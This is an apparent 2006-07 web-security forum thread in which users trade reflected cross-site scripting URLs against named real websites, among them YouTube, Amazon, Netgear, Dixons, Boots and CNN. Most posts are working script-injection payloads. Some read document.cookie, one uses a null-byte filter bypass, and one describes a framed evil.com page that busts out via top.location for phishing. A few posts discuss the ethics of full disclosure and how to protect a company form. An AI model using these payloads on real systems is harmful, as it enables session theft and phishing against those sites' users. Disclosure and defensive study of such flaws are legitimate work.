yeah, although it's not a redirect persay.. i'd agree that it was the best place for it, because you can still make a javascript redirect out of it - by putting in the frame evil.com/phish.html .. and in the phish.html including <script>top.location=document.location</script>

that's quite a run-on. the link i put here though, is indeed XSS

-maluc

Does the myspace xss have you stumped maluc?

This is going into general chat now, so i'll stop don't worry. But it was killing me yesterday, haven't looked since.

as in the body onload one?

i havent looked at it since, actually.. but i will later on (bit busy with other stuff rite now)

but in the meantime, use the one disenchant posted.

-maluc

http://developers.sun.com/contact/thankyou.jsp?dlink=&lname=&mesg=Please+visit+our+%3Cscript%3Ealert(%22Use%20C%23%22)%3C/script%3E

-maluc

A couple from Alf...

http://www.youtube.com/signup?signup_type=c%00'%22%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.amazon.com/Loose-Nelly-Furtado/dp/B000FII324/sr=8-1/qid=1166713625/ref=pd_bbs_sr_1/105-2518086-1118822?ie=UTF7&s=music%00'%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Interesting amazon one. The youtube one doesn't need the %00, but I don't get why amazon does require it. Does the input sanitation function stop searching for evil input after a null byte?

If so that's a very good find.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Nice finds, another XSS on youtube came across the FullDisclosure mailing list today.

http://seclists.org/fulldisclosure/2006/Dec/0436.html

@WhiteAcid, yeah they sure are the perfect pair sometimes. Most of the time when i find some, it saves me alot of time by just inserting a null and start pounding filters.

i don't know the exact code structure but,
i guess s=music%00 will break the filter on var 's' and so ignores the script after that, Maybe that var 's' is being echoed back to the page and so is the script.

http://www.dixons.co.uk/martprd/store/dix_page.jsp?BV_SessionID=@@@@1485948722.1167131332@@@@&BV_EngineID=ccccaddjkedfdhdcflgceggdhhmdfin.0&criterion=%3cscript%3ealert('xss')%3b%3c%2fscript%3e&low_bound=0&AtimeStamp=3344367536&page=SimpleSearchProducts&up_bound=0

http://www.netgear.com/Search.aspx?text=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E

The netgear one is quite horrendous actually, as the filter absolutely nothing. The dixons one as with PC world filters script src and some other vectors, i did'nt post the PC world one as im pretty sure i may have seen it already posted.

http://exit.uk.com/show_products.asp?b=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

1000th post... Crikey.

http://www.boots.com/guidedsearch/newsearch.jsp?searchArea=1&searchTerm=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&Go.x=0&Go.y=0&uri=%2Fguidedsearch%2Fnewsearch.jsp&classificationId=&contentId=&articleId=&N=0&Ntk=all&Nty=1

Its crazy how many of the big shopping sites are vulnerable to XSS.

Just a thought, but would'nt it be better if you could restrict this forum to members only, or members with a certain post count, as at the moment any random phisher could just use one of these holes to exploit the fuck out of some 94 year old guy wishing to purchase a tele (dixons), who then decides he may need some aftershave (boots). You may not like the idea, but i just think that maybe where just supplying the phishers with the maggots at the moment.

This topic is now rapidly becoming a database of the holes in some of (if not the) biggest websites on the 'net, therefore anyone needing xss in a website is just able to search this, I don't really know which way i sway on this actually, i just thought i'd bring it up for discussion.



Edited 2 time(s). Last edit at 12/26/2006 06:42AM by eyeced.

If you restrict this forum to only certain members doesnt that sort of defeat the purpose of "full disclosure"?

-bubbles
http://webmastertutorials.net

Yes it does bubbles. that's why full-disclosure is such a difficult and ethical discussion.

damned, it cannot print well... :/

http://wwwa.accuweather.com/forecast-current-conditions.asp?partner=romain';}alert("XSS");function foo(){var p='&traveler=1&zipChg=1&zipcode=72410&metric=1

http://www.wunderground.com/login.asp?email=%5C%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E%3C%5C%22&error=unknownuser&referer=http%3A%2F%2Fwww.wunderground.com

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 4 time(s). Last edit at 12/27/2006 05:39PM by nEUrOO.

Haven't posted anything here before because I generally don't bother looking for holes in sites, but I just tested this on impulse:

http://personalweb.about.com/gi/dynamic/offsite.htm?zu=%3C/title%3E%3Cscript%3Ealert('XSS');%3C/script%3E



Edited 1 time(s). Last edit at 12/28/2006 03:56AM by kuza55.

http://search.majestic12.co.uk/search.jhh?q=asd%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&f=0

For a search engine to not filter output like that is pretty disappointing :(

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

http://onesearch.sun.com/search/onesearch/index.jsp?qt=sun+%27%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=0&y=0&charset=utf-8&col=developer-reference&rt=true&cs=false

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

neolodge.com havent posted in a while, though I hate for my most recent post to relate to neopets :X

After stubmling upon some web filtering software called Surfwall, i managed to find a this:

xss

http://queryhome.webwall.net/webcat/accesspolicy.asp?cat=53&url=0&Matched=<script>alert('xss')</script>

normal

http://queryhome.webwall.net/webcat/accesspolicy.asp?cat=53&url=0&Matched=ha.ckers.org


Oh and this lovely error pops up when not using a interg in cat.


Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E10)
[Microsoft][ODBC Microsoft Access Driver] Too few parameters. Expected 1.
/webcat/accesspolicy.asp, line 26


Page:
GET /webcat/accesspolicy.asp


now to make a patch for the program itself to disable filtering :P

I wonder if I should make my 404 pages on my website redirect there for a laugh.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com



Edited 1 time(s). Last edit at 12/31/2006 06:02AM by Luny.

I'm wondering, do most web filters block websites completely, or just some pages? Because if they only block some pages then that could be an excellent way to attack every single website with partially blocked content.

I noticed with websense ( the filter used at my school ) that they only blocked pages. So for example myspace.com was blocked, but ww1.myspace.com was not.

Also, they blocked a jokes website I have, then one day, the server was running slow, so I requested a server change from my host, thus changing the IP. I was able to visit my site for about 2 days lol, before they blocked the new IP.

-bubbles
http://webmastertutorials.net

kuza55 Wrote:
-------------------------------------------------------
> I'm wondering, do most web filters block websites
> completely, or just some pages? Because if they
> only block some pages then that could be an
> excellent way to attack every single website with
> partially blocked content.

Well, i don't know about all, but that program I was testing, Surfwall blocked pages based on meta tag keywords and titles.

---------------
Digital footprints suck. Learn to walk on your hands.
http://www.youfucktard.com

http://www.newsvine.com/_tools/user/login?popoff&redirect=%22><script>alert('xss');</script><%22

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/01/2007 07:34PM by digi7al64.

A few I found:

http://www.sendspace.com/
XSS in description field for a site that is supposed to securely transfer files.

http://roswell.asftus.com/employee/j_security_check
XSS in the username field. Classic.

http://www.pricechallenger.com/cgi-bin/register?forgot=1&app=chall
XSS in the company field. Not much of a challenge there from the price challenger.

http://www.columbustax.net/e_file/screen_help/welcome.asp
XSS in the search field. Your Ohio tax dollars at work.

https://www.gocybercamp.org/grownups/forgot_password.php
Send your kids to this camp to learn XSS.

new user here,
trying actually to protect my company. seems like new vendor has several holes
see http://www.euclidtechnology.com/about/contact.shtml
custom form with first and last names show escape in
http://support.euclidtechnology.com/cgi-bin/memberdll.dll/AddProspect
can people let me know how bad this is?
thanks
Jono

You need to protect a contact form from automated submission? I usually use a fingerprint session here, to see if it's a bot or regular user. Use javaScript and serverside combination to prevent auto submitting, and escape bad chars. I can't see what you are doing with it on your server, is it mailed only? and does it goes into a database?

jungson, I think he's asking what dangers that contact form poses as it's vulnerable to XSS.

Well... acutally it seems it was. There is now a maxlengh enforced before output which is too short to be exploited, and since lastname isn't outputted I think XSS fragmentation isn't doable (though I didn't test the other fields).

As for what XSS can do, there was a good post on that somewhere, but I can't immediately remember where, maybe someone else can.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Ok, i got stuck on the "new user here, trying actually to protect my company" part ^^

[http://search.cnn.com/pages/search.jsp?query=""%20onclick=alert('xss')%20iframe]



Edited 1 time(s). Last edit at 01/02/2007 11:27PM by cx1.

http://computerworld.com/action/search.do?command=advancedSearch&readMoreContentId=&trackTerm=&searchTerms=%22%3B+alert%28%27xss%27%29%3B+var+d%3D%22&sortBy=&viewBy=&fromDateMonth=0&fromDateDay=1&fromDateYear=2000&resultsPerPage=10&toDateMonth=0&toDateDay=3&toDateYear=2000&x=0&y=0

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Thanks WhiteAcid and jungsonn,
I created my own form to remove any client side validation on the euclidtechnology.com site, then noticed it returned at least first name, and it allowed Image tags and other injection. the DLL seemed to block the standard xss alert boxes, (although they may have popped up on the server?)
at this point I will just inform them that they have HTML injection and indicate that it is probably worse.
Thanks for your help!
-jrhanson